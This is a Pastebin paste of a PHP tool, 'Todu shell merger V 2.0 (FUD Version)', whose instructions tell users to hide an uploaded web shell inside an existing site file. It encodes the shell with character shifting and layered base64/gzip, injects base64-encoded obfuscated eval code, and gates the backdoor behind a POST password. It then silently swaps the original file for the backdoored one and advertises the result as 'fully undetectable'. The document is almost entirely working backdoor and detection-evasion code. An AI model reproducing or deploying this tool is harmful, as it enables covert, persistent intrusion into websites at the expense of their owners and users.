mfn

Todu shell merger V 2.0 (FUD Version)

mfn
Mar 16th, 2014
358
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <head><title>Shell Merger Version 2.0</title>
  3. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  4. <STYLE>
  5. /* CSS [Thanks to Mannu shell :) this comes from there :P] */
  6. body {
  7. font-family: Tahoma
  8. }
  9. tr {
  10. BORDER: dashed 1px #333;
  11. color: #FFF;
  12. }
  13. td {
  14. BORDER: dashed 1px #333;
  15. color: #FFF;
  16. }
  17. .table1 {
  18. BORDER: 0px Black;
  19. BACKGROUND-COLOR: Black;
  20. color: #FFF;
  21. }
  22. .td1 {
  23. BORDER: 0px;
  24. BORDER-COLOR: #333333;
  25. font: 7pt Verdana;
  26. color: Green;
  27. }
  28. .tr1 {
  29. BORDER: 0px;
  30. BORDER-COLOR: #333333;
  31. color: #FFF;
  32. }
  33. table {
  34. BORDER: dashed 1px #333;
  35. BORDER-COLOR: #333333;
  36. BACKGROUND-COLOR: Black;
  37. color: #FFF;
  38. }
  39. input {
  40. border          : dashed 1px;
  41. border-color        : #333;
  42. BACKGROUND-COLOR: Black;
  43. font: 8pt Verdana;
  44. color: Red;
  45. }
  46. select {
  47. BORDER-RIGHT:  Black 1px solid;
  48. BORDER-TOP:    #DF0000 1px solid;
  49. BORDER-LEFT:   #DF0000 1px solid;
  50. BORDER-BOTTOM: Black 1px solid;
  51. BORDER-color: #FFF;
  52. BACKGROUND-COLOR: Black;
  53. font: 8pt Verdana;
  54. color: Red;
  55. }
  56. submit {
  57. BORDER:  buttonhighlight 2px outset;
  58. BACKGROUND-COLOR: Black;
  59. width: 40%;
  60. color: white;
  61. }
  62. textarea {
  63. border          : dashed 1px #333;
  64. BACKGROUND-COLOR: Black;
  65. font: Fixedsys bold;
  66. color: #999;
  67. }
  68. BODY {
  69.     SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  70. margin: 1px;
  71. color: Red;
  72. background-color: Black;
  73. }
  74. .main {
  75. margin          : -287px 0px 0px -490px;
  76. BORDER: dashed 1px #333;
  77. BORDER-COLOR: #333333;
  78. }
  79. .tt {
  80. background-color: Black;
  81. }
  82.  
  83. A:link {
  84.     COLOR: White; TEXT-DECORATION: none
  85. }
  86. A:visited {
  87.     COLOR: White; TEXT-DECORATION: none
  88. }
  89. A:hover {
  90.     color: Red; TEXT-DECORATION: none
  91. }
  92. A:active {
  93.     color: Red; TEXT-DECORATION: none
  94. }
  95.  
  96.  
  97.  
  98.  
  99. div.nav
  100. {
  101.     margin-top:1px;
  102.     height:60px;
  103.     background-color: ;
  104. }
  105. div.nav ul
  106. {
  107.     list-style: none;
  108.     padding: 4px;
  109. }
  110. div.nav li
  111. {
  112.     float: left;
  113.     margin-right: 10px;
  114.     text-align:center;
  115. }
  116. </style>
  117. </head>
  118. <body>
  119. <center>
  120. <?php
  121. if(!isset($_POST['o']))
  122. {
  123. ?>
  124. <table>
  125. <tr><td width=1000px>
  126. <center><h1><font color=silver>Todu shell merger V-2.0<br></font><font color=green>(FUD VERSION)</font></h1></center>
  127. <center><h3><font color=silver>By Sujit Ugale</font></h3></center>
  128. <marquee><font color=silver>Greetz to Manish Tanwar</font></marquee>
  129. <font size=2>Here are the steps to use this merger.
  130. <OL>
  131. <li>Enter local path of file to which ur shell is to be merged with.
  132. <li>Upload shell.
  133. <li>Select your password, which u'll use to access the merged shell.
  134. <li>Now hit the button.
  135. <li>To  access the shell, send POST variable <font color=grey>"backdoor=[your pass]"</font> to the merged file name.
  136. <li>enjoy your shell, which is now fully undetectable :)</ol></font>
  137. </td></tr>
  138. <tr><td width=1000px>
  139. <center>
  140. <br><br><br>
  141. <font color=red>
  142. <form enctype="multipart/form-data"  method="POST" action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']);?>">
  143. File path(local path)   : <input name="o" value=""><br><br>
  144. Shell (Upload it)       : <input name="userfile" type="file"><br><br>
  145. Password you want       : <input name="pass" type="password" value=""/><br><br>
  146. <input type="Submit" value="Merge it Babe!"><br><br>
  147. </form>
  148. </font>
  149. </td></tr>
  150. </table>
  151. <?php
  152. }
  153. if (@is_uploaded_file($_FILES["userfile"]["tmp_name"]))
  154. {
  155.     if(!file_exists($_POST['o'])){
  156.     die("File to be merged with does not exist");
  157. }
  158. $tempname="temp" . rand(100,1000);
  159. copy($_FILES["userfile"]["tmp_name"], "" . $_FILES["userfile"]["name"]);
  160. rename($_FILES["userfile"]["name"],$tempname);
  161. error_reporting(0);
  162. $file1=$tempname;//uploaded file(shell)
  163. $file2=$_POST['o'];//Original file to be backdoored
  164. $pass=md5($_POST['pass']);
  165. echo "Work done!!!";
  166. //Apna main plan
  167. $tempdata= base64_decode("PD9waHAKc2Vzc2lvbl9zdGFydCgpOwplcnJvcl9yZXBvcnRpbmcoMCk7").base64_decode("JHM9IkFTc0IxUDU0bkUyUFNYS0RNQkJGcnlTR3hNWENLem1Ga1R3aERBanRqREFZQkVhT3ltRTRmUnF5eWFxcnBOL3Y5UmZQNUowNVRPZTJXd2svN3NuK3FQSFRVSmllY0xUT08yRXl6bHJxRjU5Rit0SGt0alhJTHBubDlLZ3pmbXBQRFN1Rm44QTdaRENiYWFUMGVlaFY3aVRvRWdYMWVkQmQ3Z1E5OFpWM2JHTHJQREY5YWRDd3pFT0VWaGVPMk9zU01VM25yeEYyeWVLV0RwdTRRMXJwajQvTWpudGd2MmcwTnJmOXl0S0h4WFUxdEF6LzhYZEczYTdqWE95SkVhbTdkbGs4ZEVZVERmVUdWNjBXZGFXa0E3bklqT1VWZVdSeW56VHN5UjI4Y01kUHdjTTMzRExmWWE4RVB1YUk0alF4MG82clc1b0I4N1FCMS9lUkl3LzZ0VUd0SUFPNVVLMmREdzM2NDNNRVBrV0k3MWtGZHIyZ0hkOUI4OGVEbXlmQm1TVTd0MXIvZDB1UDdmWVhiSnlIdEE9PSI7CmV2YWwoYmFzZTY0X2RlY29kZShnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJHMpKSkpKTsKaWYoaXNzZXQoJF9QT1NUWydiYWNrZG9vciddKSkKewoJaWYobWQ1KCRfUE9TVFsnYmFja2Rvb3InXSk9PSI=").$pass.base64_decode("IikKCXsKCQkkX1NFU1NJT05bJ2JkJ109MTsKCX0KfQppZihpc3NldCgkX1NFU1NJT05bJ2JkJ10pICYmICRfU0VTU0lPTlsnYmQnXT09MSkKew==");
  168. file_put_contents('output.php', $tempdata);
  169.  
  170. //*********************************File 1[backdoor]********************************//
  171. function en($ins)
  172. {
  173. $in=file($ins);
  174. $out="";
  175. foreach($in as $line)
  176. {
  177.     for($i=0;$i<strlen($line);$i++)
  178.     {
  179.         $out.=(ord($line{$i})+11);
  180.         if($i<strlen($line)-1)
  181.         $out.=".";
  182.     }
  183.     $out.="%";
  184. }
  185. $k=base64_encode(gzcompress(gzdeflate($out)));
  186. return $k;
  187. }
  188. //*********************************File 1[backdoor]********************************//
  189. $tempdata=base64_decode("JGE9Ig==");//$a="
  190. file_put_contents('output.php', $tempdata, FILE_APPEND);
  191.  
  192. $tempdata=en($file1);//encoded code
  193. file_put_contents('output.php', $tempdata, FILE_APPEND);//main jugad
  194.  
  195. $tempdata=base64_decode("Ijs=");// ";
  196. file_put_contents('output.php', $tempdata."\n", FILE_APPEND);
  197.  
  198. $tempdata=base64_decode("ZXZhbCgiPz4iLmRlKCRhKSk7");/*  eval("?>".de($a));   */
  199. file_put_contents('output.php', $tempdata."\n", FILE_APPEND);// put eval in output
  200.  
  201. file_put_contents('output.php', "\n?>\n", FILE_APPEND);
  202.  
  203. $tempdata="
  204. <?php
  205. }
  206. else
  207. {
  208. ?>
  209. ";
  210. file_put_contents('output.php', $tempdata, FILE_APPEND);
  211.  
  212. //************************************File 2[original]******************************//
  213. $reader=file($file2);
  214. foreach($reader as $line)
  215. {
  216.     file_put_contents('output.php', $line, FILE_APPEND);
  217. }
  218.  
  219. $tempdata="
  220. <?php
  221. }
  222. ?>
  223. ";
  224. file_put_contents('output.php', $tempdata, FILE_APPEND);
  225.  
  226. //Now replace main file :D
  227. rename($_POST['o'],$_POST['o'].'.bak');
  228. rename('output.php', $_POST['o']);
  229. unlink('output.php');
  230. unlink($tempname);
  231. }
  232. ?>
  233. </body>
  234. </html>
Add Comment
Please, Sign In to add comment